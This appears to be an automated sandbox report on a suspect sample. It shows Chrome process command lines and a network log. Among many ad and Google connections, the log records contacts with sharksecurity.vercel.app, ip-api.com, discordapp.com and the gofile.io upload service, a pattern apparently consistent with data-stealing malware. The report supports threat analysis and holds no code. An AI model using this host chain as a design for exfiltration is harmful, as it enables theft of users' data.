"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --field-trial-handle=6760,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=9552 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --field-trial-handle=6800,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=9668 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --field-trial-handle=6916,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=9808 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --field-trial-handle=6820,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6776 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --field-trial-handle=6836,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=10104 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --field-trial-handle=7252,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=10208 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --field-trial-handle=6724,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=10340 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --field-trial-handle=7364,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7468 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --field-trial-handle=7352,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=10568 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --field-trial-handle=7344,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=10676 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --field-trial-handle=7560,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7540 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --field-trial-handle=7572,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=10896 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --field-trial-handle=6764,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7588 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --field-trial-handle=7596,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=11048 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --field-trial-handle=7604,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=11180 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6428,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=10892 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --field-trial-handle=7608,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7576 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --field-trial-handle=11568,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=11460 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --field-trial-handle=11532,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3520 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --field-trial-handle=11552,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=10380 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --field-trial-handle=11572,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=11632 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --field-trial-handle=11588,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=10112 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --field-trial-handle=11604,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=9596 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --field-trial-handle=11628,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=9572 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --field-trial-handle=11644,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=9196 /prefetch:1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x308 0x2d0
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --field-trial-handle=7688,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3496 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --field-trial-handle=3560,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=10420 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --field-trial-handle=6036,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7728 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6020,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=10544 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=10552,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=10500 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --field-trial-handle=10112,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6056 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=11664,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=10180 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=10456,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=11308 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3496,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3368 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sharksecurity.vercel.app | udp |
| US | 76.76.21.241:443 | sharksecurity.vercel.app | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 241.21.76.76.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 216.58.204.67:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 67.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discordapp.com | udp |
| US | 162.159.135.233:443 | discordapp.com | tcp |
| US | 8.8.8.8:53 | 233.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | udp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.187.234:443 | ogads-pa.googleapis.com | tcp |
| GB | 216.58.201.110:443 | apis.google.com | tcp |
| GB | 142.250.187.234:443 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | 3.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.16.238:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.178.14:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 216.58.213.1:443 | clients2.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gofile.io | udp |
| FR | 45.112.123.126:443 | gofile.io | tcp |
| FR | 45.112.123.126:443 | gofile.io | tcp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 45.112.123.126:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | 126.123.112.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | s.gofile.io | udp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| US | 8.8.8.8:53 | 210.242.75.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 172.217.169.42:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | 42.169.217.172.in-addr.arpa | udp |
| GB | 142.250.179.228:443 | www.google.com | udp |
| GB | 142.250.187.234:443 | content-autofill.googleapis.com | udp |
| GB | 172.217.16.238:443 | play.google.com | udp |
| US | 8.8.8.8:53 | www-ezyzip-com.webpkgcache.com | udp |
| US | 8.8.8.8:53 | dns-tunnel-check.googlezip.net | udp |
| US | 8.8.8.8:53 | tunnel.googlezip.net | udp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| US | 216.239.34.157:443 | tunnel.googlezip.net | tcp |
| GB | 142.250.179.225:443 | www-ezyzip-com.webpkgcache.com | tcp |
| GB | 142.250.179.225:443 | www-ezyzip-com.webpkgcache.com | udp |
| US | 216.239.34.157:443 | tunnel.googlezip.net | tcp |
| US | 8.8.8.8:53 | 157.34.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.169.217.172.in-addr.arpa | udp |
| GB | 172.217.16.238:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| GB | 216.58.201.110:443 | apis.google.com | udp |
| GB | 142.250.179.225:443 | www-ezyzip-com.webpkgcache.com | udp |
| US | 8.8.8.8:53 | cdn.fuseplatform.net | udp |
| US | 8.8.8.8:53 | kit.fontawesome.com | udp |
| US | 8.8.8.8:53 | ajax.cloudflare.com | udp |
| US | 8.8.8.8:53 | www.ezyzip.com | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | live.primis.tech | udp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | tcp |
| US | 104.17.159.237:443 | cdn.fuseplatform.net | tcp |
| US | 104.18.40.68:443 | kit.fontawesome.com | tcp |
| US | 104.17.72.14:443 | ajax.cloudflare.com | tcp |
| US | 104.26.6.193:443 | www.ezyzip.com | tcp |
| US | 104.26.6.193:443 | www.ezyzip.com | tcp |
| US | 104.26.6.193:443 | www.ezyzip.com | tcp |
| GB | 18.172.89.123:443 | live.primis.tech | tcp |
| US | 104.26.6.193:443 | www.ezyzip.com | udp |
| US | 8.8.8.8:53 | cmp.inmobi.com | udp |
| US | 104.17.159.237:443 | cdn.fuseplatform.net | tcp |
| DE | 3.162.79.89:443 | cmp.inmobi.com | tcp |
| US | 8.8.8.8:53 | assets.pinterest.com | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 8.8.8.8:53 | c.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| GB | 23.44.64.184:443 | assets.pinterest.com | tcp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | tcp |
| DE | 3.162.86.128:443 | c.amazon-adsystem.com | tcp |
| US | 104.16.79.73:443 | static.cloudflareinsights.com | tcp |
| DE | 3.162.79.89:443 | cmp.inmobi.com | tcp |
| US | 8.8.8.8:53 | ka-f.fontawesome.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | www.dropbox.com | udp |
| US | 104.21.26.223:443 | ka-f.fontawesome.com | tcp |
| US | 104.21.26.223:443 | ka-f.fontawesome.com | tcp |
| US | 104.21.26.223:443 | ka-f.fontawesome.com | tcp |
| US | 104.21.26.223:443 | ka-f.fontawesome.com | tcp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | udp |
| NL | 162.125.65.18:443 | www.dropbox.com | tcp |
| GB | 142.250.178.2:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 151.101.129.229:443 | cdn.jsdelivr.net | tcp |
| DE | 3.162.86.128:443 | c.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | config.aps.amazon-adsystem.com | udp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | udp |
| GB | 23.44.64.184:443 | assets.pinterest.com | udp |
| DE | 18.64.119.104:443 | config.aps.amazon-adsystem.com | tcp |
| US | 104.21.26.223:443 | ka-f.fontawesome.com | udp |
| US | 8.8.8.8:53 | cdn.id5-sync.com | udp |
| US | 104.22.52.86:443 | cdn.id5-sync.com | tcp |
| US | 8.8.8.8:53 | 14.24.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.159.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.40.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.72.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.6.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.89.172.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.79.162.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.64.44.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.79.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 128.86.162.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.26.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.65.125.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | btloader.com | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| US | 104.22.74.216:443 | btloader.com | tcp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| GB | 216.58.204.78:443 | fundingchoicesmessages.google.com | tcp |
| US | 216.239.34.36:443 | region1.google-analytics.com | tcp |
| US | 8.8.8.8:53 | ad-delivery.net | udp |
| US | 104.26.2.70:443 | ad-delivery.net | tcp |
| US | 104.26.2.70:443 | ad-delivery.net | tcp |
| US | 8.8.8.8:53 | api.cmp.inmobi.com | udp |
| GB | 216.58.204.78:443 | fundingchoicesmessages.google.com | udp |
| DE | 3.124.147.49:443 | api.cmp.inmobi.com | tcp |
| DE | 3.124.147.49:443 | api.cmp.inmobi.com | tcp |
| US | 8.8.8.8:53 | api.btloader.com | udp |
| US | 130.211.23.194:443 | api.btloader.com | tcp |
| US | 130.211.23.194:443 | api.btloader.com | tcp |
| US | 8.8.8.8:53 | 229.129.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.119.64.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.52.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.74.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.34.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.2.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.147.124.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.23.211.130.in-addr.arpa | udp |
| US | 8.8.8.8:53 | log.pinterest.com | udp |
| US | 151.101.192.84:443 | log.pinterest.com | tcp |
| GB | 18.172.89.123:443 | live.primis.tech | udp |
| GB | 142.250.178.2:443 | googleads.g.doubleclick.net | tcp |
| GB | 142.250.178.2:443 | googleads.g.doubleclick.net | tcp |
| GB | 142.250.178.2:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | tags.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | d1b5ad80e298bf58c15c464b7934fde5.safeframe.googlesyndication.com | udp |
| GB | 216.58.212.226:443 | ep1.adtrafficquality.google | tcp |
| DE | 3.162.79.62:443 | tags.crwdcntrl.net | tcp |
| US | 8.8.8.8:53 | htlb.casalemedia.com | udp |
| US | 8.8.8.8:53 | hbopenbid.pubmatic.com | udp |
| US | 8.8.8.8:53 | tlx.3lift.com | udp |
| GB | 216.58.213.1:443 | d1b5ad80e298bf58c15c464b7934fde5.safeframe.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | prebid.a-mo.net | udp |
| US | 8.8.8.8:53 | ssc.33across.com | udp |
| US | 8.8.8.8:53 | a.teads.tv | udp |
| US | 8.8.8.8:53 | ib.adnxs.com | udp |
| US | 104.18.36.155:443 | htlb.casalemedia.com | tcp |
| US | 8.8.8.8:53 | i.connectad.io | udp |
| US | 79.127.243.248:443 | ssc.33across.com | tcp |
| US | 79.127.243.248:443 | ssc.33across.com | tcp |
| US | 79.127.243.248:443 | ssc.33across.com | tcp |
| US | 79.127.243.248:443 | ssc.33across.com | tcp |
| US | 8.8.8.8:53 | ap.lijit.com | udp |
| IE | 52.211.27.144:443 | ap.lijit.com | tcp |
| FR | 163.5.194.36:443 | prebid.a-mo.net | tcp |
| US | 23.192.21.192:443 | a.teads.tv | tcp |
| US | 104.22.54.206:443 | i.connectad.io | tcp |
| GB | 185.64.190.77:443 | hbopenbid.pubmatic.com | tcp |
| US | 8.8.8.8:53 | bidder.criteo.com | udp |
| US | 8.8.8.8:53 | rtb.openx.net | udp |
| US | 8.8.8.8:53 | prg-apac.smartadserver.com | udp |
| DE | 3.78.168.176:443 | tlx.3lift.com | tcp |
| US | 8.8.8.8:53 | aax.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| DE | 37.252.171.52:443 | ib.adnxs.com | tcp |
| US | 35.227.252.103:443 | rtb.openx.net | tcp |
| NL | 178.250.1.56:443 | bidder.criteo.com | tcp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| DE | 18.64.95.121:443 | aax.amazon-adsystem.com | tcp |
| FR | 51.178.195.208:443 | prg-apac.smartadserver.com | tcp |
| FR | 51.178.195.208:443 | prg-apac.smartadserver.com | tcp |
| FR | 51.178.195.208:443 | prg-apac.smartadserver.com | tcp |
| FR | 51.178.195.208:443 | prg-apac.smartadserver.com | tcp |
| GB | 142.250.179.225:443 | ep2.adtrafficquality.google | tcp |
| IE | 18.202.187.23:443 | bcp.crwdcntrl.net | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.179.225:443 | ep2.adtrafficquality.google | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | api.intentiq.com | udp |
| US | 151.101.192.84:443 | log.pinterest.com | udp |
| US | 8.8.8.8:53 | sync.intentiq.com | udp |
| DE | 3.160.39.97:443 | api.intentiq.com | tcp |
| DE | 18.64.103.118:443 | sync.intentiq.com | tcp |
| US | 8.8.8.8:53 | aax-eu.amazon-adsystem.com | udp |
| IE | 67.220.224.144:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | pubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| US | 8.8.8.8:53 | u.openx.net | udp |
| US | 8.8.8.8:53 | cs-server-s2s.yellowblue.io | udp |
| US | 8.8.8.8:53 | pixel.quantserve.com | udp |
| US | 8.8.8.8:53 | x.bidswitch.net | udp |
| GB | 216.58.201.98:443 | pubads.g.doubleclick.net | tcp |
| GB | 142.250.178.2:443 | googleads.g.doubleclick.net | udp |
| GB | 216.58.201.98:443 | pubads.g.doubleclick.net | udp |
| DE | 91.228.74.244:443 | pixel.quantserve.com | tcp |
| US | 35.244.159.8:443 | u.openx.net | tcp |
| US | 34.232.208.164:443 | cs-server-s2s.yellowblue.io | tcp |
| US | 8.8.8.8:53 | csync.loopme.me | udp |
| US | 8.8.8.8:53 | ssum-sec.casalemedia.com | udp |
| US | 8.8.8.8:53 | eb2.3lift.com | udp |
| US | 8.8.8.8:53 | pixel.rubiconproject.com | udp |
| NL | 35.214.136.108:443 | x.bidswitch.net | tcp |
| US | 8.8.8.8:53 | ups.analytics.yahoo.com | udp |
| GB | 2.23.204.244:443 | ads.pubmatic.com | tcp |
| US | 8.8.8.8:53 | mb9eo.publishers.tremorhub.com | udp |
| US | 8.8.8.8:53 | cs.media.net | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 15.197.193.217:443 | match.adsrvr.org | tcp |
| GB | 87.248.114.11:443 | ups.analytics.yahoo.com | tcp |
